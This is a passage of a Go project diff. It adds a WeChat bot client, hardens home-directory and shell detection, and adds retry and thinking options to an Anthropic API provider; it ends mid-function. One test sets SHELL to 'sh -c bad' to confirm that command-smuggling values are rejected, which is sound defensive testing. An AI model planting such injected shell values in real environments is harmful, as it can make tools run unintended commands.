+	FromUserID   string        `json:"from_user_id"`
+	ToUserID     string        `json:"to_user_id"`
+	ClientID     string        `json:"client_id"`
+	CreateTimeMs int64         `json:"create_time_ms"`
+	MessageType  MessageType   `json:"message_type"`
+	ContextToken string        `json:"context_token"`
+	ItemList     []MessageItem `json:"item_list"`
+}
+
+// MessageItem is a single content item within a message.
+type MessageItem struct {
+	Type     MessageItemType `json:"type"`
+	TextItem *TextItem       `json:"text_item,omitempty"`
+}
+
+// TextItem holds text content.
+type TextItem struct {
+	Text string `json:"text"`
+}
+
+// --- API response types ---
+
+// QRCodeResponse from get_bot_qrcode.
+type QRCodeResponse struct {
+	QRCode       string `json:"qrcode"`
+	QRCodeImgURL string `json:"qrcode_img_content"`
+}
+
+// QRStatusResponse from get_qrcode_status.
+type QRStatusResponse struct {
+	Status       string `json:"status"`
+	BotToken     string `json:"bot_token,omitempty"`
+	BotID        string `json:"ilink_bot_id,omitempty"`
+	UserID       string `json:"ilink_user_id,omitempty"`
+	BaseURL      string `json:"baseurl,omitempty"`
+	RedirectHost string `json:"redirect_host,omitempty"`
+}
+
+// GetUpdatesResponse from getupdates.
+type GetUpdatesResponse struct {
+	Ret           int               `json:"ret"`
+	Msgs          []json.RawMessage `json:"msgs"`
+	GetUpdatesBuf string            `json:"get_updates_buf"`
+	ErrCode       int               `json:"errcode,omitempty"`
+	ErrMsg        string            `json:"errmsg,omitempty"`
+}
+
+// GetConfigResponse from getconfig.
+type GetConfigResponse struct {
+	TypingTicket string `json:"typing_ticket,omitempty"`
+}
+
+// Credentials holds login credentials.
+type Credentials struct {
+	Token     string `json:"token"`
+	BaseURL   string `json:"baseUrl"`
+	AccountID string `json:"accountId"`
+	UserID    string `json:"userId"`
+	SavedAt   string `json:"savedAt,omitempty"`
+}
+
+// IncomingMessage is a parsed incoming user message.
+type IncomingMessage struct {
+	UserID       string
+	Text         string
+	Timestamp    time.Time
+	ContextToken string
+}
+
+// APIError is returned when the iLink API returns a non-zero ret or HTTP error.
+type APIError struct {
+	Message    string
+	HTTPStatus int
+	ErrCode    int
+}
+
+func (e *APIError) Error() string {
+	return fmt.Sprintf("ilink api: %s (http=%d, errcode=%d)", e.Message, e.HTTPStatus, e.ErrCode)
+}
+
+// IsSessionExpired returns true if this error indicates session timeout.
+func (e *APIError) IsSessionExpired() bool {
+	return e.ErrCode == -14
+}
diff --git a/internal/messaging/wechat/wechat.go b/internal/messaging/wechat/wechat.go
new file mode 100644
index 0000000..9e257a5
--- /dev/null
+++ b/internal/messaging/wechat/wechat.go
@@ -0,0 +1,321 @@
+package wechat
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"log"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/messaging"
+)
+
+// Bot implements messaging.Platform for WeChat via the iLink protocol.
+type Bot struct {
+	client        *Client
+	creds         *Credentials
+	credPath      string
+	autoTyping    bool
+	connected     bool
+	stopped       bool
+	mu            sync.Mutex
+	cancelPoll    context.CancelFunc
+	contextTokens sync.Map // map[userID]contextToken
+	cursor        string
+}
+
+// BotOptions configures a WeChat Bot.
+type BotOptions struct {
+	CredPath   string
+	AutoTyping bool
+}
+
+// NewBot creates a new WeChat bot.
+func NewBot(opts BotOptions) *Bot {
+	return &Bot{
+		client:     NewClient(),
+		credPath:   opts.CredPath,
+		autoTyping: opts.AutoTyping,
+	}
+}
+
+// --- messaging.Platform implementation ---
+
+func (b *Bot) Name() string { return "wechat" }
+
+func (b *Bot) IsConnected() bool {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+	return b.connected
+}
+
+// Start begins long-poll message receiving. Blocks until ctx is cancelled.
+func (b *Bot) Start(ctx context.Context, handler messaging.MessageHandler) error {
+	// Load credentials
+	creds, err := LoadCredentials(b.credPath)
+	if err != nil || creds == nil {
+		return fmt.Errorf("wechat: no credentials found at %s — run 'vibecoding hermes wechat login' first", b.credPath)
+	}
+
+	b.mu.Lock()
+	b.creds = creds
+	b.connected = true
+	b.stopped = false
+	pollCtx, cancel := context.WithCancel(ctx)
+	b.cancelPoll = cancel
+	b.mu.Unlock()
+
+	log.Printf("[wechat] Long-poll loop started (user: %s)", creds.UserID)
+	retryDelay := time.Second
+
+	for {
+		select {
+		case <-pollCtx.Done():
+			b.mu.Lock()
+			b.connected = false
+			b.mu.Unlock()
+			log.Printf("[wechat] Long-poll loop stopped")
+			return nil
+		default:
+		}
+
+		b.mu.Lock()
+		currentCreds := b.creds
+		b.mu.Unlock()
+
+		updates, err := b.client.GetUpdates(pollCtx, currentCreds.BaseURL, currentCreds.Token, b.cursor)
+		if err != nil {
+			if pollCtx.Err() != nil {
+				return nil
+			}
+
+			apiErr, isAPI := err.(*APIError)
+			if isAPI && apiErr.IsSessionExpired() {
+				log.Printf("[wechat] Session expired — re-login required")
+				ClearCredentials(b.credPath)
+				b.contextTokens = sync.Map{}
+				b.cursor = ""
+				// Try re-login
+				newCreds, loginErr := Login(pollCtx, b.client, LoginOptions{
+					CredPath: b.credPath,
+					Force:    true,
+				})
+				if loginErr != nil {
+					log.Printf("[wechat] Re-login failed: %v", loginErr)
+					time.Sleep(retryDelay)
+					continue
+				}
+				b.mu.Lock()
+				b.creds = newCreds
+				b.mu.Unlock()
+				retryDelay = time.Second
+				continue
+			}
+
+			log.Printf("[wechat] Poll error: %v", err)
+			time.Sleep(retryDelay)
+			if retryDelay < 10*time.Second {
+				retryDelay *= 2
+			}
+			continue
+		}
+
+		if updates.GetUpdatesBuf != "" {
+			b.cursor = updates.GetUpdatesBuf
+		}
+		retryDelay = time.Second
+
+		for _, rawMsg := range updates.Msgs {
+			var wire WireMessage
+			if err := json.Unmarshal(rawMsg, &wire); err != nil {
+				continue
+			}
+
+			// Remember context tokens
+			b.rememberContext(&wire)
+
+			// Only process user messages
+			if wire.MessageType != MessageTypeUser {
+				continue
+			}
+
+			text := extractText(wire.ItemList)
+			if text == "" {
+				continue
+			}
+
+			msg := messaging.InboundMessage{
+				Platform:  "wechat",
+				ChatID:    wire.FromUserID,
+				UserID:    wire.FromUserID,
+				Text:      text,
+				Timestamp: time.UnixMilli(wire.CreateTimeMs),
+			}
+
+			// Show typing indicator
+			if b.autoTyping {
+				go b.sendTyping(pollCtx, wire.FromUserID)
+			}
+
+			// Handle message
+			go func(m messaging.InboundMessage, ct string) {
+				// Create progress buffer: max 7 progress lines per batch, reserve 3 for summary
+				progressBuf := messaging.NewProgressBuffer(7, func(text string) {
+					if err := b.SendMessage(pollCtx, wire.FromUserID, text); err != nil {
+						log.Printf("[wechat] Progress send error: %v", err)
+					}
+				})
+				m.ProgressFunc = func(text string) {
+					progressBuf.Add(text)
+				}
+
+				response, err := handler(pollCtx, m)
+
+				// Flush remaining progress lines before final summary
+				progressBuf.Flush()
+
+				if err != nil {
+					log.Printf("[wechat] Handler error for %s: %v", m.UserID, err)
+					response = "⚠️ Error: " + err.Error()
+				}
+				if response != "" {
+					if sendErr := b.sendText(pollCtx, m.UserID, response, ct); sendErr != nil {
+						log.Printf("[wechat] Send error for %s: %v", m.UserID, sendErr)
+					} else {
+						log.Printf("[wechat] Message sent to %s successfully (len=%d)", m.UserID, len(response))
+					}
+				} else {
+					log.Printf("[wechat] Empty response for %s, not sending", m.UserID)
+				}
+				// Stop typing
+				if b.autoTyping {
+					b.stopTyping(pollCtx, m.UserID)
+				}
+			}(msg, wire.ContextToken)
+		}
+	}
+}
+
+// Stop gracefully stops the bot.
+func (b *Bot) Stop() error {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+	b.stopped = true
+	if b.cancelPoll != nil {
+		b.cancelPoll()
+	}
+	return nil
+}
+
+// SendMessage sends a text message to a user.
+func (b *Bot) SendMessage(ctx context.Context, chatID string, text string) error {
+	ct, ok := b.contextTokens.Load(chatID)
+	if !ok {
+		return fmt.Errorf("no context_token for user %s", chatID)
+	}
+	return b.sendText(ctx, chatID, text, ct.(string))
+}
+
+// --- Internal ---
+
+func (b *Bot) sendText(ctx context.Context, userID, text, contextToken string) error {
+	b.mu.Lock()
+	creds := b.creds
+	b.mu.Unlock()
+
+	if creds == nil {
+		return fmt.Errorf("not logged in")
+	}
+
+	chunks := chunkText(text, 4000)
+	for _, chunk := range chunks {
+		msg := BuildTextMessage(creds.UserID, userID, contextToken, chunk)
+		if err := b.client.SendMessage(ctx, creds.BaseURL, creds.Token, msg); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func (b *Bot) sendTyping(ctx context.Context, userID string) {
+	ct, ok := b.contextTokens.Load(userID)
+	if !ok {
+		return
+	}
+	b.mu.Lock()
+	creds := b.creds
+	b.mu.Unlock()
+	if creds == nil {
+		return
+	}
+	config, err := b.client.GetConfig(ctx, creds.BaseURL, creds.Token, userID, ct.(string))
+	if err != nil || config.TypingTicket == "" {
+		return
+	}
+	b.client.SendTyping(ctx, creds.BaseURL, creds.Token, userID, config.TypingTicket, 1)
+}
+
+func (b *Bot) stopTyping(ctx context.Context, userID string) {
+	ct, ok := b.contextTokens.Load(userID)
+	if !ok {
+		return
+	}
+	b.mu.Lock()
+	creds := b.creds
+	b.mu.Unlock()
+	if creds == nil {
+		return
+	}
+	config, err := b.client.GetConfig(ctx, creds.BaseURL, creds.Token, userID, ct.(string))
+	if err != nil || config.TypingTicket == "" {
+		return
+	}
+	b.client.SendTyping(ctx, creds.BaseURL, creds.Token, userID, config.TypingTicket, 2)
+}
+
+func (b *Bot) rememberContext(wire *WireMessage) {
+	userID := wire.FromUserID
+	if wire.MessageType == MessageTypeBot {
+		userID = wire.ToUserID
+	}
+	if userID != "" && wire.ContextToken != "" {
+		b.contextTokens.Store(userID, wire.ContextToken)
+	}
+}
+
+func extractText(items []MessageItem) string {
+	var parts []string
+	for _, item := range items {
+		if item.Type == ItemText && item.TextItem != nil {
+			parts = append(parts, item.TextItem.Text)
+		}
+	}
+	return strings.Join(parts, "\n")
+}
+
+func chunkText(text string, limit int) []string {
+	if len(text) <= limit {
+		return []string{text}
+	}
+	var chunks []string
+	for len(text) > 0 {
+		if len(text) <= limit {
+			chunks = append(chunks, text)
+			break
+		}
+		cut := limit
+		if idx := strings.LastIndex(text[:limit], "\n\n"); idx > limit*3/10 {
+			cut = idx + 2
+		} else if idx := strings.LastIndex(text[:limit], "\n"); idx > limit*3/10 {
+			cut = idx + 1
+		}
+		chunks = append(chunks, text[:cut])
+		text = text[cut:]
+	}
+	return chunks
+}
+
+// Ensure Bot implements messaging.Platform at compile time.
+var _ messaging.Platform = (*Bot)(nil)
diff --git a/internal/platform/platform.go b/internal/platform/platform.go
index d239fbd..12e4202 100644
--- a/internal/platform/platform.go
+++ b/internal/platform/platform.go
@@ -31,8 +31,14 @@ func IsLinux() bool {
 
 // HomeDir returns the user's home directory.
 func HomeDir() string {
-	home, _ := os.UserHomeDir()
-	return home
+	home, err := os.UserHomeDir()
+	if err == nil && home != "" {
+		return home
+	}
+	if cwd, err := os.Getwd(); err == nil && cwd != "" {
+		return cwd
+	}
+	return string(os.PathSeparator)
 }
 
 // ConfigDir returns the platform-specific configuration directory.
@@ -41,17 +47,18 @@ func ConfigDir() string {
 		return dir
 	}
 
-	switch runtime.GOOS {
+	return configDirForOS(runtime.GOOS, HomeDir(), os.Getenv("APPDATA"))
+}
+
+func configDirForOS(goos, home, appData string) string {
+	switch goos {
 	case "windows":
-		appData := os.Getenv("APPDATA")
 		if appData != "" {
 			return filepath.Join(appData, "vibecoding")
 		}
-		return filepath.Join(HomeDir(), "AppData", "Roaming", "vibecoding")
-	case "darwin":
-		return filepath.Join(HomeDir(), "Library", "Application Support", "vibecoding")
+		return filepath.Join(home, "AppData", "Roaming", "vibecoding")
 	default: // linux and others
-		return filepath.Join(HomeDir(), ".vibecoding")
+		return filepath.Join(home, ".vibecoding")
 	}
 }
 
@@ -92,7 +99,7 @@ func SkillsDir() string {
 
 // DefaultShell returns the default shell for the current platform.
 func DefaultShell() string {
-	if shell := os.Getenv("SHELL"); shell != "" {
+	if shell := os.Getenv("SHELL"); isExecutableAbsolutePath(shell) {
 		return shell
 	}
 
@@ -110,12 +117,24 @@ func DefaultShell() string {
 	}
 }
 
+func isExecutableAbsolutePath(path string) bool {
+	if path == "" || !filepath.IsAbs(path) {
+		return false
+	}
+	info, err := os.Stat(path)
+	if err != nil || info.IsDir() {
+		return false
+	}
+	return info.Mode()&0111 != 0
+}
+
 // ShellArgs returns the arguments to execute a command in the shell.
 func ShellArgs(shell, command string) []string {
+	normalizedShell := strings.ToLower(shell)
 	switch {
-	case strings.Contains(shell, "powershell"):
+	case strings.Contains(normalizedShell, "powershell"):
 		return []string{"-NoProfile", "-NonInteractive", "-Command", command}
-	case strings.Contains(shell, "cmd"):
+	case strings.Contains(normalizedShell, "cmd"):
 		return []string{"/c", command}
 	default: // bash, zsh, etc.
 		return []string{"-c", command}
diff --git a/internal/platform/platform_test.go b/internal/platform/platform_test.go
index 402b84d..1f2ed4a 100644
--- a/internal/platform/platform_test.go
+++ b/internal/platform/platform_test.go
@@ -72,6 +72,48 @@ func TestConfigDir(t *testing.T) {
 	}
 }
 
+func TestConfigDirForOS(t *testing.T) {
+	home := filepath.Join(string(os.PathSeparator), "home", "tester")
+	appData := filepath.Join(string(os.PathSeparator), "Users", "tester", "AppData", "Roaming")
+
+	tests := []struct {
+		name    string
+		goos    string
+		appData string
+		want    string
+	}{
+		{
+			name: "darwin defaults to home dot directory",
+			goos: "darwin",
+			want: filepath.Join(home, ".vibecoding"),
+		},
+		{
+			name: "linux defaults to home dot directory",
+			goos: "linux",
+			want: filepath.Join(home, ".vibecoding"),
+		},
+		{
+			name:    "windows uses appdata when available",
+			goos:    "windows",
+			appData: appData,
+			want:    filepath.Join(appData, "vibecoding"),
+		},
+		{
+			name: "windows falls back to roaming appdata",
+			goos: "windows",
+			want: filepath.Join(home, "AppData", "Roaming", "vibecoding"),
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if got := configDirForOS(tt.goos, home, tt.appData); got != tt.want {
+				t.Fatalf("configDirForOS() = %q, want %q", got, tt.want)
+			}
+		})
+	}
+}
+
 func TestDataDir(t *testing.T) {
 	dir := DataDir()
 	if dir == "" {
@@ -124,6 +166,14 @@ func TestDefaultShell(t *testing.T) {
 	}
 }
 
+func TestDefaultShellIgnoresRelativeShellEnv(t *testing.T) {
+	t.Setenv("SHELL", "sh -c bad")
+
+	if got := DefaultShell(); got == "sh -c bad" {
+		t.Fatal("DefaultShell trusted relative SHELL env")
+	}
+}
+
 func TestShellArgs(t *testing.T) {
 	tests := []struct {
 		shell    string
diff --git a/internal/provider/anthropic/provider.go b/internal/provider/anthropic/provider.go
index af3e40c..fc73bed 100644
--- a/internal/provider/anthropic/provider.go
+++ b/internal/provider/anthropic/provider.go
@@ -23,8 +23,11 @@ type Provider struct {
 	baseURL string
 	client  *http.Client
 
-	thinkingFormat      string // "", "anthropic", "xiaomi"
-	cacheControlEnabled *bool  // nil=auto (on for official API, off for proxies), true=force on, false=force off
+	thinkingFormat      string // "", "anthropic", "deepseek", "xiaomi"
+	cacheControlEnabled *bool  // nil=off (must be explicitly enabled), true=on, false=off
+
+	// Retry configuration
+	retryConfig *provider.RetryConfig
 }
 
 // DefaultModels returns the default Anthropic model list.
@@ -60,6 +63,22 @@ func NewProvider(apiKey, baseURL string) *Provider {
 
 // NewProviderWithModels creates a new Anthropic provider with custom models.
 func NewProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Provider {
+	p, err := NewProviderWithModelsAndProxy(apiKey, baseURL, "", models)
+	if err != nil {
+		return newProviderWithHTTPClient(apiKey, baseURL, models, &http.Client{Timeout: 30 * time.Minute})
+	}
+	return p
+}
+
+func NewProviderWithModelsAndProxy(apiKey, baseURL, proxyURL string, models []*provider.Model) (*Provider, error) {
+	client, err := provider.NewHTTPClient(30*time.Minute, proxyURL)
+	if err != nil {
+		return nil, fmt.Errorf("configure http proxy: %w", err)
+	}
+	return newProviderWithHTTPClient(apiKey, baseURL, models, client), nil
+}
+
+func newProviderWithHTTPClient(apiKey, baseURL string, models []*provider.Model, client *http.Client) *Provider {
 	if baseURL == "" {
 		baseURL = "https://api.anthropic.com"
 	}
@@ -70,47 +89,59 @@ func NewProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Pr
 		BaseProvider: provider.NewBaseProvider("anthropic", models),
 		apiKey:       apiKey,
 		baseURL:      strings.TrimRight(baseURL, "/"),
-		client:       &http.Client{Timeout: 30 * time.Minute},
+		client:       client,
 	}
 }
 
 // SetThinkingFormat sets the thinking parameter format.
-// "anthropic" = thinking with budget_tokens, "xiaomi" = thinking without budget_tokens
+// "anthropic" = thinking with budget_tokens, "deepseek" = thinking with output_config,
+// "xiaomi" = legacy thinking-only format.
 func (p *Provider) SetThinkingFormat(format string) {
 	p.thinkingFormat = format
 }
 
+// SetRetryConfig sets the retry configuration for this provider.
+func (p *Provider) SetRetryConfig(cfg *provider.RetryConfig) {
+	p.retryConfig = cfg
+}
+
 // SetCacheControlEnabled sets whether to use cache_control markers.
-// nil = auto (on for official API, off for proxies)
-// true = force on
-// false = force off
+// nil = off (default), true = on, false = off
 func (p *Provider) SetCacheControlEnabled(enabled *bool) {
 	p.cacheControlEnabled = enabled
 }
 
 // IsCacheControlEnabled returns whether cache_control markers should be used.
-// Auto mode: enabled for official Anthropic API, disabled for proxies.
+// Must be explicitly enabled via SetCacheControlEnabled or provider config "cacheControl": true.
+// Defaults to false when not configured.
 func (p *Provider) IsCacheControlEnabled() bool {
 	if p.cacheControlEnabled != nil {
 		return *p.cacheControlEnabled
 	}
-	// Auto mode: only enable for official Anthropic API
-	return p.baseURL == "https://api.anthropic.com"
+	return false
 }
 
 type anthropicRequest struct {
-	Model     string             `json:"model"`
-	Messages  []anthropicMessage `json:"messages"`
-	System    interface{}        `json:"system,omitempty"` // string or []anthropicContentBlock for cache_control
-	Tools     []anthropicTool    `json:"tools,omitempty"`
-	MaxTokens int                `json:"max_tokens"`
-	Stream    bool               `json:"stream"`
-	Thinking  *anthropicThinking `json:"thinking,omitempty"`
+	Model        string                 `json:"model"`
+	Messages     []anthropicMessage     `json:"messages"`
+	System       interface{}            `json:"system,omitempty"` // string or []anthropicContentBlock for cache_control
+	Tools        []anthropicTool        `json:"tools,omitempty"`
+	MaxTokens    int                    `json:"max_tokens"`
+	Temperature  *float64               `json:"temperature,omitempty"`
+	TopP         *float64               `json:"top_p,omitempty"`
+	Stream       bool                   `json:"stream"`
+	Thinking     *anthropicThinking     `json:"thinking,omitempty"`
+	OutputConfig *anthropicOutputConfig `json:"output_config,omitempty"`
 }
 
 type anthropicThinking struct {
 	Type         string `json:"type"`
 	BudgetTokens *int   `json:"budget_tokens,omitempty"`
+	Display      string `json:"display,omitempty"`
+}
+
+type anthropicOutputConfig struct {
+	Effort string `json:"effort"`
 }
 
 type anthropicMessage struct {
@@ -123,18 +154,18 @@ type anthropicCacheControl struct {
 }
 
 type anthropicContentBlock struct {
-	Type         string                 `json:"type"`
-	Text         string                 `json:"text,omitempty"`
-	Thinking     string                 `json:"thinking,omitempty"`
-	Signature    string                 `json:"signature,omitempty"`
-	Source       *anthropicImage        `json:"source,omitempty"`
-	ID           string                 `json:"id,omitempty"`
-	Name         string                 `json:"name,omitempty"`
+	Type         string                  `json:"type"`
+	Text         string                  `json:"text,omitempty"`
+	Thinking     string                  `json:"thinking,omitempty"`
+	Signature    string                  `json:"signature,omitempty"`
+	Source       *anthropicImage         `json:"source,omitempty"`
+	ID           string                  `json:"id,omitempty"`
+	Name         string                  `json:"name,omitempty"`
 	Input        *map[string]interface{} `json:"input,omitempty"`
-	ToolUseID    string                 `json:"tool_use_id,omitempty"`
-	Content      interface{}            `json:"content,omitempty"`
-	IsError      bool                   `json:"is_error,omitempty"`
-	CacheControl *anthropicCacheControl `json:"cache_control,omitempty"`
+	ToolUseID    string                  `json:"tool_use_id,omitempty"`
+	Content      interface{}             `json:"content,omitempty"`
+	IsError      bool                    `json:"is_error,omitempty"`
+	CacheControl *anthropicCacheControl  `json:"cache_control,omitempty"`
 }
 
 type anthropicImage struct {
@@ -144,19 +175,20 @@ type anthropicImage struct {
 }
 
 type anthropicTool struct {
-	Name        string          `json:"name"`
-	Description string          `json:"description"`
-	InputSchema json.RawMessage `json:"input_schema"`
+	Type        string          `json:"type,omitempty"`
+	Name        string          `json:"name,omitempty"`
+	Description string          `json:"description,omitempty"`
+	InputSchema json.RawMessage `json:"input_schema,omitempty"`
 }
 
 type anthropicResponse struct {
-	Type         string                 `json:"type"`
-	Index        int                    `json:"index,omitempty"`
-	Delta        *anthropicDelta        `json:"delta,omitempty"`
-	ContentBlock *contentBlock          `json:"content_block,omitempty"`
-	Message      *anthropicMsg          `json:"message,omitempty"`
-	Usage        *anthropicUsage        `json:"usage,omitempty"`
-	Error        *anthropicStreamError  `json:"error,omitempty"`
+	Type         string                `json:"type"`
+	Index        int                   `json:"index,omitempty"`
+	Delta        *anthropicDelta       `json:"delta,omitempty"`
+	ContentBlock *contentBlock         `json:"content_block,omitempty"`
+	Message      *anthropicMsg         `json:"message,omitempty"`
+	Usage        *anthropicUsage       `json:"usage,omitempty"`
+	Error        *anthropicStreamError `json:"error,omitempty"`
 }
 
 type anthropicStreamError struct {
@@ -211,6 +243,7 @@ func (p *Provider) Chat(ctx context.Context, params provider.ChatParams) <-chan
 				modelID = "claude-sonnet-4-20250514"
 			}
 		}
+		model := p.GetModel(modelID)
 
 		maxTokens := params.MaxTokens
 		if maxTokens == 0 {
@@ -218,11 +251,13 @@ func (p *Provider) Chat(ctx context.Context, params provider.ChatParams) <-chan
 		}
 
 		reqBody := anthropicRequest{
-			Model:     modelID,
-			Messages:  p.convertMessages(params),
-			Tools:     p.convertTools(params.Tools),
-			MaxTokens: maxTokens,
-			Stream:    true,
+			Model:       modelID,
+			Messages:    p.convertMessages(params),
+			Tools:       p.convertTools(params.Tools),
+			MaxTokens:   maxTokens,
+			Temperature: params.Temperature,
+			TopP:        params.TopP,
+			Stream:      true,
 		}
 		if params.SystemPrompt != "" {
 			if p.IsCacheControlEnabled() {
@@ -239,21 +274,30 @@ func (p *Provider) Chat(ctx context.Context, params provider.ChatParams) <-chan
 			}
 		}
 
-		if params.ThinkingLevel != provider.ThinkingOff {
+		if params.ThinkingLevel != provider.ThinkingOff && model != nil && model.Reasoning {
 			// Determine thinking format: explicit config > URL auto-detect > default
-			format := p.thinkingFormat
-			if format == "" && strings.Contains(p.baseURL, "xiaomimimo") {
-				format = "xiaomi"
-			}
+			format := p.thinkingFormatForModel(model)
 			switch format {
+			case "deepseek":
+				reqBody.Thinking = &anthropicThinking{Type: "enabled"}
+				reqBody.OutputConfig = &anthropicOutputConfig{Effort: deepseekReasoningEffort(params.ThinkingLevel)}
 			case "xiaomi":
 				reqBody.Thinking = &anthropicThinking{Type: "enabled"}
+			case "adaptive":
+				reqBody.Thinking = &anthropicThinking{Type: "adaptive", Display: "summarized"}
+				reqBody.OutputConfig = &anthropicOutputConfig{Effort: anthropicAdaptiveEffort(params.ThinkingLevel)}
 			default: // "anthropic" or ""
-				budget := thinkingBudget(params.ThinkingLevel)
-				reqBody.Thinking = &anthropicThinking{Type: "enabled", BudgetTokens: &budget}
+				if useAdaptiveThinking(model, modelID) {
+					reqBody.Thinking = &anthropicThinking{Type: "adaptive", Display: "summarized"}
+					reqBody.OutputConfig = &anthropicOutputConfig{Effort: anthropicAdaptiveEffort(params.ThinkingLevel)}
+				} else {
+					budget := thinkingBudget(params.ThinkingLevel)
+					reqBody.Thinking = &anthropicThinking{Type: "enabled", BudgetTokens: &budget}
+				}
 			}
 		}
 
+		// Build the request body once (reused across retries)
 		body, err := json.Marshal(reqBody)
 		if err != nil {
 			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("marshal: %w", err)}
@@ -265,35 +309,87 @@ func (p *Provider) Chat(ctx context.Context, params provider.ChatParams) <-chan
 			fmt.Fprintf(os.Stderr, "[DEBUG] Request body: %s\n", string(body))
 		}
 
-		req, err := http.NewRequestWithContext(ctx, "POST", p.baseURL+"/v1/messages", bytes.NewReader(body))
-		if err != nil {
-			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("request: %w", err)}
-			return
+		// Retry loop: retries only the initial HTTP connection, not the SSE stream.
+		maxRetries := 0
+		baseDelayMs := 2000
+		if p.retryConfig != nil && p.retryConfig.Enabled {
+			maxRetries = p.retryConfig.MaxRetries
+			baseDelayMs = p.retryConfig.BaseDelayMs
 		}
-		req.Header.Set("Content-Type", "application/json")
-		req.Header.Set("x-api-key", p.apiKey)
-		req.Header.Set("anthropic-version", "2023-06-01")
-		req.Header.Set("Accept", "text/event-stream")
-		req.Header.Set("User-Agent", ua.ProviderUserAgent())
 
-		resp, err := p.client.Do(req)
-		if err != nil {
-			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("send: %w", err)}
-			return
-		}
-		defer resp.Body.Close()
-
-		if resp.StatusCode != http.StatusOK {
-			b, _ := io.ReadAll(resp.Body)
-			// Log request body on error for debugging
-			if os.Getenv("VIBECODING_DEBUG") != "" {
-				fmt.Fprintf(os.Stderr, "[DEBUG] API Error %d: %s\n", resp.StatusCode, string(b))
-				fmt.Fprintf(os.Stderr, "[DEBUG] Request body was: %s\n", string(body))
+		for attempt := 0; attempt <= maxRetries; attempt++ {
+			if err := ctx.Err(); err != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: err, StopReason: "aborted"}
+				return
 			}
-			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("API %d: %s", resp.StatusCode, string(b))}
+
+			req, err := http.NewRequestWithContext(ctx, "POST", p.baseURL+"/v1/messages", bytes.NewReader(body))
+			if err != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("request: %w", err)}
+				return
+			}
+			req.Header.Set("Content-Type", "application/json")
+			req.Header.Set("x-api-key", p.apiKey)
+			req.Header.Set("anthropic-version", "2023-06-01")
+			req.Header.Set("Accept", "text/event-stream")
+			req.Header.Set("User-Agent", ua.ProviderUserAgent())
+
+			resp, err := p.client.Do(req)
+			if err != nil {
+				if attempt < maxRetries && provider.IsRetryable(err, 0) {
+					delay := provider.RetryDelay(attempt, baseDelayMs)
+					ch <- provider.StreamEvent{
+						Type:         provider.StreamRetry,
+						RetryAttempt: attempt + 1,
+						RetryMax:     maxRetries,
+						Error:        fmt.Errorf("%s", provider.FormatRetryMessage(attempt, maxRetries, delay, err)),
+					}
+					select {
+					case <-ctx.Done():
+						ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+						return
+					case <-time.After(delay):
+					}
+					continue
+				}
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("send: %w", err)}
+				return
+			}
+
+			if resp.StatusCode != http.StatusOK {
+				b, _ := io.ReadAll(resp.Body)
+				resp.Body.Close()
+				if os.Getenv("VIBECODING_DEBUG") != "" {
+					fmt.Fprintf(os.Stderr, "[DEBUG] API Error %d: %s\n", resp.StatusCode, string(b))
+					fmt.Fprintf(os.Stderr, "[DEBUG] Request body was: %s\n", string(body))
+				}
+				if attempt < maxRetries && provider.IsRetryable(nil, resp.StatusCode) {
+					delay := provider.RetryDelay(attempt, baseDelayMs)
+					ch <- provider.StreamEvent{
+						Type:         provider.StreamRetry,
+						RetryAttempt: attempt + 1,
+						RetryMax:     maxRetries,
+						Error:        fmt.Errorf("%s", provider.FormatRetryMessage(attempt, maxRetries, delay, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(b)))),
+					}
+					select {
+					case <-ctx.Done():
+						ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+						return
+					case <-time.After(delay):
+					}
+					continue
+				}
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("API %d: %s", resp.StatusCode, string(b))}
+				return
+			}
+
+			// Success: stream the SSE response. No retry once streaming starts.
+			p.parseSSE(ctx, resp.Body, ch, params)
+			resp.Body.Close()
 			return
 		}
-		p.parseSSE(ctx, resp.Body, ch, params)
+
+		ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("all %d retry attempts exhausted", maxRetries)}
 	}()
 	return ch
 }
@@ -438,49 +534,17 @@ func (p *Provider) parseSSE(ctx context.Context, body io.Reader, ch chan<- provi
 func (p *Provider) convertMessages(params provider.ChatParams) []anthropicMessage {
 	cacheEnabled := p.IsCacheControlEnabled()
 	var messages []anthropicMessage
-	for _, msg := range params.Messages {
+	for i := 0; i < len(params.Messages); i++ {
+		msg := params.Messages[i]
 		am := anthropicMessage{Role: msg.Role}
 		if msg.Role == "toolResult" {
-			am.Role = "user"
-			if len(msg.Contents) > 0 {
-				// Rich tool result: send text as tool_result, images as separate user message.
-				// Many API routing layers only detect images in user messages, not inside tool_result.
-				var imageBlocks []anthropicContentBlock
-				var textContent string
-				var hasCacheControl bool
-				for _, c := range msg.Contents {
-					switch c.Type {
-					case "text":
-						textContent = c.Text
-						if c.CacheControl != nil {
-							hasCacheControl = true
-						}
-					case "image":
-						if c.Image != nil {
-							imageBlocks = append(imageBlocks, anthropicContentBlock{Type: "image", Source: &anthropicImage{Type: "base64", MediaType: c.Image.MimeType, Data: c.Image.Data}})
-						}
-					}
-				}
-				// Send tool_result with text only
-				if textContent != "" {
-					resultBlock := anthropicContentBlock{Type: "tool_result", ToolUseID: msg.ToolCallID, Content: textContent, IsError: msg.IsError}
-					if hasCacheControl && cacheEnabled {
-						resultBlock.CacheControl = &anthropicCacheControl{Type: "ephemeral"}
-					}
-					am.Content = []anthropicContentBlock{resultBlock}
